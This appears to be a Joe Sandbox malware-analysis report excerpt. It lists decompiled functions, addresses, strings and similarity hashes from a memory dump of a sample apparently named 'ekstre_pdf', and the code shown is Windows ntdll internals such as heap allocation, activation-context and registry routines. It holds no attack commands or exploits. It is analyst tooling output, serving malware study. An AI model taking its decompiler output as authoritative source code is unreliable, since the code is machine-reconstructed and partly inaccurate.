				_v8 =  *0x3415b370 ^ _t154;
				_v556 = _a12;
				_t128 =  &_v532;
				_v560 = _a8;
				_t147 = 0;
				_v564 = _a16;
				_t142 = 0;
				_v540 = __ecx;
				_v532 = 0;
				_t131 = 0;
				_v552 = 0;
				_t95 = 2;
				_v550 = _t95;
				_t96 = _a4;
				_v536 = 0;
				_v544 = 0;
				_v548 = _t128;
				if(_t96 == 0x3403120c) {
					E340EEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					L39:
					return E340A4B50(_t148, _t128, _v8 ^ _t154, _t141, _t142, _t148);
				}
				if(_v560 != 0) {
					 *_v560 =  *_v560 & 0;
					_t147 = 0;
				}
				if(_v556 != _t131) {
					 *_v556 =  *_v556 & _t131;
					_t147 = _t131;
				}
				if(_v564 != _t131) {
					 *_v564 =  *_v564 & _t142;
					_t131 = _t142;
				}
				if((_v540 & 0xfffffffc) != 0 || _t141 == 0 || _v560 == _t142 || _v556 == _t142) {
					_push(_v556);
					_push(_v560);
					_push(_t141);
					_push(_v540);
					E340EEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags                : 0x%lx\nSXS:    Peb                  : %p\nSXS:    ActivationContextData: %p\nSXS:    AssemblyStorageMap   : %p\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					goto L37;
				} else {
					if(_t96 != 0) {
						if(_t96 == 0xfffffffc) {
							L24:
							_t57 = _t141 + 0x200; // 0x230
							_t131 = _t57;
							_t104 =  *_t131;
							_t58 = _t141 + 0x204; // 0x234
							_t147 = _t58;
							_v536 = _t131;
							_v544 = _t147;
							if(_t104 == 0) {
								L33:
								_t105 =  *_t147;
								L34:
								_t141 = _v556;
								 *_v556 = _t105;
								 *_v560 =  *_t131;
								_t107 = _v564;
								if(_t107 != 0) {
									 *_t107 = _t142;
								}
								_t148 = 0;
								L37:
								if(_t128 != 0 && _t128 !=  &_v532) {
									E34073B90( &_v552);
								}
								goto L39;
							}
							_t142 =  *((intOrPtr*)(_t104 + 0x18)) + _t104;
							L26:
							_t141 = 0;
							if( *_t131 != 0 &&  *_t147 == 0) {
								_t108 =  *(_t142 + 8);
								if( *(_t142 + 8) > 0x3ffffffc) {
									_t148 = 0xc0000095;
									goto L37;
								}
								_t129 = E34075D90(_t131,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc + _t108 * 4);
								if(_t129 == 0) {
									_t148 = 0xc0000017;
									L51:
									_t128 = _v548;
									goto L37;
								}
								_t141 =  *(_t142 + 8);
								_t67 = _t129 + 0xc; // 0xc
								_t113 = E340933D0(_t129,  *(_t142 + 8), _t67);
								_t148 = _t113;
								if(_t113 < 0) {
									E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
									goto L51;
								}
								_t147 = _v544;
								asm("lock cmpxchg [esi], ecx");
								if(0 != 0) {
									E34059303(_t129);
									E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
								}
								_t131 = _v536;
								_t128 = _v548;
							}
							goto L33;
						}
						if((_v540 & 0x00000003) != 0) {
							goto L12;
						}
						_t55 = _t96 + 0x10; // 0x10
						_t131 = _t55;
						_t141 =  *_t131;
						if(_t141 == 0) {
							_t148 = 0xc00000e5;
							goto L39;
						}
						_t142 =  *((intOrPtr*)(_t141 + 0x18)) + _t141;
						_t105 = _t96 + 0x5c;
						goto L34;
					}
					L12:
					if(_t96 == 0xfffffffc || (_v540 & 0x00000002) != 0) {
						goto L24;
					} else {
						if(_t96 != 0) {
							if((_v540 & 0x00000001) == 0) {
								goto L26;
							}
						}
						_t31 = _t141 + 0x1f8; // 0x228
						_t131 = _t31;
						_t119 =  *_t131;
						_t32 = _t141 + 0x1fc; // 0x22c
						_t147 = _t32;
						_v536 = _t131;
						_v544 = _t147;
						if(_t119 == 0) {
							goto L33;
						}
						_t142 =  *((intOrPtr*)(_t119 + 0x18)) + _t119;
						_v568 = _t142;
						if( *_t147 != 0) {
							goto L26;
						}
						_t120 =  *((intOrPtr*)(_t141 + 0x10));
						_t141 = 0x208;
						_t139 =  *(_t120 + 0x38);
						_t142 =  *(_t120 + 0x3c);
						_t149 = _t139 & 0x0000ffff;
						_v540 = _t139;
						_t41 = _t149 + 0xe; // 0x23a
						_t121 = _t41;
						if(_t121 > 0x208) {
							if(_t121 <= 0xfffe) {
								_v550 = _t139 + 0xe;
								_t128 = E34075D60(_t139 + 0x0000000e & 0x0000ffff);
								_v548 = _t128;
								if(_t128 != 0) {
									L19:
									E340A88C0(_t128, _t142, _t149);
									_t131 = _v536;
									_v552 = _v540 + 0xc;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t142 = _v568;
									_t147 = _v544;
									goto L26;
								}
								_t148 = 0xc0000017;
								goto L39;
							}
							_t148 = 0xc0000106;
							goto L39;
						}
						_t128 =  &_v532;
						_v550 = 0x208;
						_v548 = _t128;
						goto L19;
					}
				}
			}

0x3409265c
0x3409266e
0x34092675
0x3409267b
0x34092685
0x3409268b
0x34092691
0x34092697
0x3409269b
0x340926a1
0x340926a8
0x340926aa
0x340926b3
0x340926b4
0x340926bb
0x340926be
0x340926c4
0x340926ca
0x340926d5
0x340d1ff1
0x340d1ff9
0x34092906
0x34092916
0x34092916
0x340926e1
0x340926e9
0x340926eb
0x340926eb
0x340926f3
0x340926fb
0x340926fd
0x340926fd
0x34092705
0x3409270d
0x3409270f
0x3409270f
0x3409271b
0x340d20a8
0x340d20ae
0x340d20b4
0x340d20b5
0x340d20c9
0x340d20d1
0x00000000
0x34092741
0x34092743
0x34092813
0x3409283c
0x3409283c
0x3409283c
0x34092842
0x34092844
0x34092844
0x3409284a
0x34092850
0x34092858
0x340928d2
0x340928d2
0x340928d4
0x340928d4
0x340928da
0x340928e4
0x340928e6
0x340928ee
0x340928f0
0x340928f0
0x340928f2
0x340928f4
0x340928f6
0x340d20e2
0x340d20e2
0x00000000
0x340928f6
0x3409285d
0x3409285f
0x3409285f
0x34092863
0x34092869
0x34092871
0x340d205d
0x00000000
0x340d205d
0x3409288e
0x34092892
0x340d2067
0x340d2080
0x340d2080
0x00000000
0x340d2080
0x34092898
0x3409289b
0x340928a1
0x340928a6
0x340928aa
0x340d207b
0x00000000
0x340d207b
0x340928b0
0x340928ba
0x340928c0
0x340d208d
0x340d209e
0x340d209e
0x340928c6
0x340928cc
0x340928cc
0x00000000
0x34092863
0x3409281c
0x00000000
0x00000000
0x34092822
0x34092822
0x34092825
0x34092829
0x340d2003
0x00000000
0x340d2003
0x34092832
0x34092834
0x00000000
0x34092834
0x34092749
0x3409274c
0x00000000
0x3409275f
0x34092761
0x340d2014
0x00000000
0x00000000
0x340d201a
0x34092767
0x34092767
0x3409276d
0x3409276f
0x3409276f
0x34092775
0x3409277b
0x34092783
0x00000000
0x00000000
0x3409278c
0x34092791
0x34092797
0x00000000
0x00000000
0x3409279d
0x340927a0
0x340927a5
0x340927a8
0x340927ab
0x340927ae
0x340927b4
0x340927b4
0x340927b9
0x340d2024
0x340d2033
0x340d2043
0x340d2045
0x340d204d
0x340927d2
0x340927d5
0x340927e8
0x340927ee
0x340927fd
0x340927fe
0x340927ff
0x34092800
0x34092802
0x34092808
0x00000000
0x34092808
0x340d2053
0x00000000
0x340d2053
0x340d2026
0x00000000
0x340d2026
0x340927bf
0x340927c5
0x340927cc
0x00000000
0x340927cc
0x3409274c

Strings

.Local, xrefs: 340927F8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 340D20C0
SXS: %s() passed the empty activation context, xrefs: 340D1FE8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 340D1FE3, 340D20BB

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: ffc9888996fc433dcb2f155a04dc85e7ecdfadc0cbbd1ca3b657723b32d1e07a
Instruction ID: 05d1f7ebc95d62bd2ece6b98c821b8b40ed8c6071677751aaf3b3d696ef03309
Opcode Fuzzy Hash: ffc9888996fc433dcb2f155a04dc85e7ecdfadc0cbbd1ca3b657723b32d1e07a
Instruction Fuzzy Hash: CAA18975B013299BEB60CE64D884BDAB7F5AF59314F1005EED808AB2A1D7309E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 3405F5C7 Relevance: 5.2, Strings: 4, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E3405F5C7(void* __ecx, void* __edx) {
				char _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				void* __ebx;
				intOrPtr _t63;
				void* _t66;
				signed int _t73;
				void* _t77;
				void* _t78;
				signed char* _t81;
				intOrPtr _t82;
				signed char* _t87;
				intOrPtr _t88;
				void* _t89;
				signed char* _t92;
				signed char _t98;
				void* _t110;
				void* _t130;
				void* _t136;
				signed int _t138;
				void* _t140;

				_t140 = (_t138 & 0xfffffff8) - 0x24;
				_t110 = __edx;
				_t136 = __ecx;
				E3405F858(__edx,  &_v36,  &_v40);
				if(E340968EA( *((intOrPtr*)(_t136 + 0x1f8)) -  *((intOrPtr*)(_t136 + 0x244)), _t136, _t136 + 0xd4) == 0) {
					_t128 = 0xc000012d;
					L17:
					_t63 =  *[fs:0x30];
					 *((intOrPtr*)(_t136 + 0x228)) =  *((intOrPtr*)(_t136 + 0x228)) + 1;
					__eflags =  *(_t63 + 0xc);
					if( *(_t63 + 0xc) == 0) {
						_push("HEAP: ");
						E3405B910();
					} else {
						E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_v40);
					_push(_v36);
					_push(_t136);
					E3405B910("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t128);
					_t66 = 0;
					L15:
					return _t66;
				}
				if(( *(_t136 + 0x40) & 0x00040000) != 0) {
					_t130 = 0x40;
					_push(0);
					_push(0x1c);
					_push(_t140 + 0x1c);
					_push(3);
					_push(_t136);
					_push(0xffffffff);
					_t73 = E340A2BE0();
					__eflags = _t73;
					if(_t73 < 0) {
						L22:
						E34125FED(0, _t136, "true",  *((intOrPtr*)(_t140 + 0x20)), 0, 0);
						goto L2;
					}
					__eflags =  *(_t140 + 0x18) & 0x00000060;
					if(( *(_t140 + 0x18) & 0x00000060) == 0) {
						goto L22;
					}
					__eflags =  *((intOrPtr*)(_t140 + 0x14)) - _t136;
					if( *((intOrPtr*)(_t140 + 0x14)) == _t136) {
						L3:
						_push(_t130);
						_push("true");
						_push( &_v40);
						_push(0);
						_push( &_v36);
						_push(0xffffffff);
						_t77 = E340A2B10();
						_t128 = _t77;
						if(_t77 < 0) {
							goto L17;
						}
						_t78 = E34073C40();
						_t131 = 0x7ffe0380;
						if(_t78 != 0) {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t81 = 0x7ffe0380;
						}
						if( *_t81 != 0) {
							_t82 =  *[fs:0x30];
							__eflags =  *(_t82 + 0x240) & 0x00000001;
							if(( *(_t82 + 0x240) & 0x00000001) != 0) {
								E3411EFD3(_t110, _t136, _v36, _v40, 8);
							}
						}
						 *((intOrPtr*)(_t136 + 0x240)) =  *((intOrPtr*)(_t136 + 0x240)) - 1;
						 *((intOrPtr*)(_t136 + 0x244)) =  *((intOrPtr*)(_t136 + 0x244)) - _v40;
						if(E34073C40() != 0) {
							_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t87 = _t131;
						}
						if( *_t87 != 0) {
							_t88 =  *[fs:0x30];
							__eflags =  *(_t88 + 0x240) & 0x00000001;
							if(( *(_t88 + 0x240) & 0x00000001) != 0) {
								__eflags = E34073C40();
								if(__eflags != 0) {
									_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								E3411F1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t131 & 0x000000ff);
							}
						}
						_t89 = E34073C40();
						_t132 = 0x7ffe038a;
						if(_t89 != 0) {
							_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t92 = 0x7ffe038a;
						}
						if( *_t92 != 0) {
							__eflags = E34073C40();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							}
							E3411F1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t132 & 0x000000ff);
						}
						 *((intOrPtr*)(_t136 + 0x21c)) =  *((intOrPtr*)(_t136 + 0x21c)) + 1;
						_t98 =  *(_t110 + 2);
						if((_t98 & 0x00000004) != 0) {
							E340B8140(_v36, _v40, 0xfeeefeee);
							_t98 =  *(_t110 + 2);
						}
						 *(_t110 + 2) = _t98 & 0x00000017;
						_t66 = 1;
						goto L15;
					}
					goto L22;
				}
				L2:
				_t130 = 4;
				goto L3;
			}

0x3405f5cf
0x3405f5d9
0x3405f5e0
0x3405f5e3
0x3405f607
0x340be162
0x340be167
0x340be167
0x340be16d
0x340be173
0x340be177
0x340be2dd
0x340be2e2
0x340be17d
0x340be192
0x340be197
0x340be2e8
0x340be2ec
0x340be2f0
0x340be2f7
0x340be2ff
0x3405f6ba
0x3405f6c0
0x3405f6c0
0x3405f614
0x340be19f
0x340be1a0
0x340be1a2
0x340be1a8
0x340be1a9
0x340be1ab
0x340be1ac
0x340be1ae
0x340be1b3
0x340be1b5
0x340be1c8
0x340be1d6
0x00000000
0x340be1d6
0x340be1b7
0x340be1bc
0x00000000
0x00000000
0x340be1be
0x340be1c2
0x3405f61d
0x3405f61d
0x3405f61e
0x3405f627
0x3405f628
0x3405f62e
0x3405f62f
0x3405f631
0x3405f636
0x3405f63a
0x00000000
0x00000000
0x3405f640
0x3405f645
0x3405f64c
0x340be1e9
0x3405f652
0x3405f652
0x3405f652
0x3405f657
0x340be1f3
0x340be1f9
0x340be200
0x340be212
0x340be212
0x340be200
0x3405f661
0x3405f667
0x3405f674
0x340be225
0x3405f67a
0x3405f67a
0x3405f67a
0x3405f67f
0x340be22f
0x340be235
0x340be23c
0x340be247
0x340be249
0x340be254
0x340be254
0x340be254
0x340be26f
0x340be26f
0x340be23c
0x3405f685
0x3405f68a
0x3405f691
0x340be282
0x3405f697
0x3405f697
0x3405f697
0x3405f69c
0x340be291
0x340be293
0x340be29e
0x340be29e
0x340be29e
0x340be2b9
0x340be2b9
0x3405f6a2
0x3405f6a8
0x3405f6ad
0x340be2d0
0x340be2d5
0x340be2d5
0x3405f6b5
0x3405f6b8
0x00000000
0x3405f6b8
0x00000000
0x340be1c2
0x3405f61a
0x3405f61c
0x00000000

Strings

HEAP[%wZ]: , xrefs: 340BE18D
HEAP: , xrefs: 340BE2DD
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 340BE2F2
`, xrefs: 340BE1B7

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: a4d96b7c0488d970c76b29076efae928cb4d2c8816d4eddfa82be548eac4ced7
Instruction ID: 0058ed8d797b43b8e44bcf40e133285cceae262f887fdebe74a2b75bcfc81857
Opcode Fuzzy Hash: a4d96b7c0488d970c76b29076efae928cb4d2c8816d4eddfa82be548eac4ced7
Instruction Fuzzy Hash: 9061D375308780AFF711CB64C954F5B7BE9EF84754F1408E9E9948B2A1C638E900CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 340590F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 340BB82F, 340BB86C
VirtualProtect Failed 0x%p %x, xrefs: 340BB849
VirtualQuery Failed 0x%p %x, xrefs: 340BB886
HEAP: , xrefs: 340BB83C, 340BB879

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: 0e4de12809c2ca8b8ea74e318dedaa0f328cea010b8030812bb4988baf99e467
Instruction ID: 20147e550e8ddbbc74b1d0eaeb01c2e56799d95c044b8dddfbe712e74a559d1b
Opcode Fuzzy Hash: 0e4de12809c2ca8b8ea74e318dedaa0f328cea010b8030812bb4988baf99e467
Instruction Fuzzy Hash: 9531AF36B00215EFDB11DB99CD84F9AB7B8EB85760F1044E5E854AB2A1D631EA40CE64

Uniqueness

Uniqueness Score: -1.00%

Function 340A1190 Relevance: 5.1, Strings: 4, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E340A1190(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				signed int _t38;
				signed int _t39;
				void* _t55;
				void* _t61;
				void* _t62;
				signed int _t63;
				void* _t65;
				signed int _t70;

				_t55 = __edx;
				E340A5050(__ecx,  &_v20, __ecx);
				_v52 = 0x18;
				_v44 =  &_v20;
				_v48 = 0;
				_push( &_v52);
				_push(0x20019);
				_v40 = 0x40;
				_push( &_v12);
				_v36 = 0;
				_v32 = 0;
				_t62 = E340A2AB0();
				if(_t62 < 0) {
					L9:
					return _t62;
				}
				_t38 = _a8;
				_t63 = 2;
				_t39 = _t38 * _t63;
				_t70 = _t38 * _t63 >> 0x20;
				if(_t70 < 0 || _t70 <= 0 && _t39 <= 0xffffffff) {
					_v8 = _t39;
					_push( &_v8);
					_t61 = 0xc;
					_t58 = _t39;
					if(E3409457E(_t39, _t61) < 0) {
						goto L13;
					}
					_t65 = E34075D90(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
					if(_t65 == 0) {
						_t62 = 0xc0000017;
					} else {
						_t20 =  &_v28; // 0x3409e065
						E340A5050(_t58, _t20, _t55);
						_push( &_a8);
						_push(_v8);
						_t23 =  &_v28; // 0x3409e065
						_push(_t65);
						_push(_t63);
						_push(_v12);
						_t62 = E340A2B00();
						if(_t62 >= 0) {
							_t28 = _t65 + 0xc; // 0xc
							E340A88C0(_a4, _t28,  *((intOrPtr*)(_t65 + 8)));
						}
						E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
					}
					_push(_v12);
					E340A2A80();
					goto L9;
				} else {
					L13:
					_push(_v12);
					E340A2A80();
					return 0xc0000095;
				}
			}

0x340a119f
0x340a11a2
0x340a11aa
0x340a11b1
0x340a11b9
0x340a11bc
0x340a11bd
0x340a11c5
0x340a11cc
0x340a11cd
0x340a11d0
0x340a11d8
0x340a11dc
0x340a126d
0x00000000
0x340a126d
0x340a11e2
0x340a11e7
0x340a11e8
0x340a11ea
0x340a11ec
0x340a1200
0x340a1203
0x340a1206
0x340a1207
0x340a1210
0x00000000
0x00000000
0x340a1229
0x340a122d
0x340a128a
0x340a122f
0x340a1230
0x340a1234
0x340a123c
0x340a123d
0x340a1240
0x340a1243
0x340a1244
0x340a1246
0x340a124e
0x340a1252
0x340a1279
0x340a1280
0x340a1285
0x340a1260
0x340a1260
0x340a1265
0x340a1268
0x00000000
0x340d9a99
0x340d9a99
0x340d9a99
0x340d9a9c
0x00000000
0x340d9aa1

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 340A119B
@, xrefs: 340A11C5
e4, xrefs: 340A1230, 340A1240, 340A1233, 340A1245
BuildLabEx, xrefs: 340A122F

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e4
API String ID: 0-310499156
Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction ID: bb59c04bd66a04f1e1c1e1dd93a2ab29c2cc33385fb8485ce9434a62d0acd8f9
Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction Fuzzy Hash: 4D315072B00619FFEB118BD4CD44EDEBBBDEB84758F0040A9E514AB260E734DA159BA1

Uniqueness

Uniqueness Score: -1.00%

Function 340E166E Relevance: 5.1, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E340E166E(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t19;
				void* _t23;
				intOrPtr _t26;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t38;
				void* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;

				_t44 = __ecx;
				_t30 = 0;
				_v16 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x54)) +  *((intOrPtr*)( *[fs:0x30] + 8)) + 0xffffffd4;
				_t19 = E340A9EB0(_t42, "BoG_ *90.0&!!  Yy>", 0x13);
				_t48 = _t47 + 0xc;
				if(_t19 != 0 ||  *((intOrPtr*)(_t42 + 0x20)) > 3) {
					_t43 = 1;
					_v8 = 1;
					_t46 = _t44 + 0x18 + ( *(_t44 + 0x14) & 0x0000ffff);
					_v12 = _t30;
					if(0 <  *(_v16 + 6)) {
						while(1) {
							_t23 = E340A9EB0(_t46, "stxt371", 9);
							_t48 = _t48 + 0xc;
							if(_t23 == 0) {
								goto L12;
							}
							if(_t43 != 0) {
								_t29 = E340A9EB0(_t46, ".txt", 6);
								_t48 = _t48 + 0xc;
								_t43 = _t29;
							}
							_t26 = _v8;
							if(_t26 != 0) {
								_t26 = E340A9EB0(_t46, ".txt2", 7);
								_t48 = _t48 + 0xc;
								_v8 = _t26;
							}
							if(_t43 != 0 || _t26 != 0) {
								_t46 = _t46 + 0x28;
								_t38 = _v12 + 1;
								_v12 = _t38;
								if(_t38 < ( *(_v16 + 6) & 0x0000ffff)) {
									continue;
								} else {
								}
							} else {
								goto L12;
							}
							goto L13;
						}
						goto L12;
					}
				} else {
					L12:
					_t30 = 1;
					 *( *[fs:0x30] + 3) =  *( *[fs:0x30] + 3) | 0x00000008;
				}
				L13:
				return _t30;
			}

0x340e167e
0x340e1680
0x340e1689
0x340e1691
0x340e1699
0x340e16a0
0x340e16a6
0x340e16b2
0x340e16b7
0x340e16ba
0x340e16bc
0x340e16c8
0x340e16ca
0x340e16d2
0x340e16d7
0x340e16dc
0x00000000
0x00000000
0x340e16e0
0x340e16ea
0x340e16ef
0x340e16f2
0x340e16f2
0x340e16f4
0x340e16f9
0x340e1703
0x340e1708
0x340e170b
0x340e170b
0x340e1710
0x340e1719
0x340e171f
0x340e1720
0x340e1729
0x00000000
0x00000000
0x340e172b
0x00000000
0x00000000
0x00000000
0x00000000
0x340e1710
0x00000000
0x340e16ca
0x340e172d
0x340e172d
0x340e1733
0x340e1741
0x340e1741
0x340e1746
0x340e174a

Strings

.txt, xrefs: 340E16E4
BoG_ *90.0&!! Yy>, xrefs: 340E1693
.txt2, xrefs: 340E16FD
stxt371, xrefs: 340E16CC

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
API String ID: 0-1880532218
Opcode ID: 18ab95e4344bc9282a006b0aa5180cfda81286e0666a8a16ac06b5400281e94a
Instruction ID: 9b39bdd0b2eacafa759d7304fd08c390462ebc278416786c73dd52a4a6b54ac0
Opcode Fuzzy Hash: 18ab95e4344bc9282a006b0aa5180cfda81286e0666a8a16ac06b5400281e94a
Instruction Fuzzy Hash: 6521247AB01A04AFD701CB69D941FAAF3F5AF45B44F0880E9E885AF341EA34D951CB40

Uniqueness

Uniqueness Score: -1.00%

Function 34067072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 340C15E0
RtlDebugPrintTimes.NTDLL ref: 340C15F5

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b98e735e83dbd47fec63e9da6ae6ba7ec95cca3770568e3dcc44c3ba224a9e52
Instruction ID: 5cc51ae29164308505fdbe1cc533e0031a22feb16730954d2251dd586fa1685a
Opcode Fuzzy Hash: b98e735e83dbd47fec63e9da6ae6ba7ec95cca3770568e3dcc44c3ba224a9e52
Instruction Fuzzy Hash: 4451EC34B00605EFFB05DBA8C9847ADBBB9FF44369F1041AAE4139B290DB789911CF91

Uniqueness

Uniqueness Score: -1.00%

Function 340F3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

LdrpResSearchResourceHandle Enter, xrefs: 340F3666
LdrpResSearchResourceHandle Exit, xrefs: 340F3681
PE, xrefs: 340F37D2

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
API String ID: 0-1168191160
Opcode ID: b6431f54c4fe485428b48c2ea4e9e809413bd493595accaa2407eacc33a5ae28
Instruction ID: 2380dfcce54fe7e315d6fd2302d0bf4f06e9f8524f3db65145647f44a1a289a2
Opcode Fuzzy Hash: b6431f54c4fe485428b48c2ea4e9e809413bd493595accaa2407eacc33a5ae28
Instruction Fuzzy Hash: E5F160B5B047288BDB20CF24CD90BD9B3B5EF44764F4480E9DA09A7640EB369E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 3408F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 340D0128
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 340D00C7
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 340D00F1

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

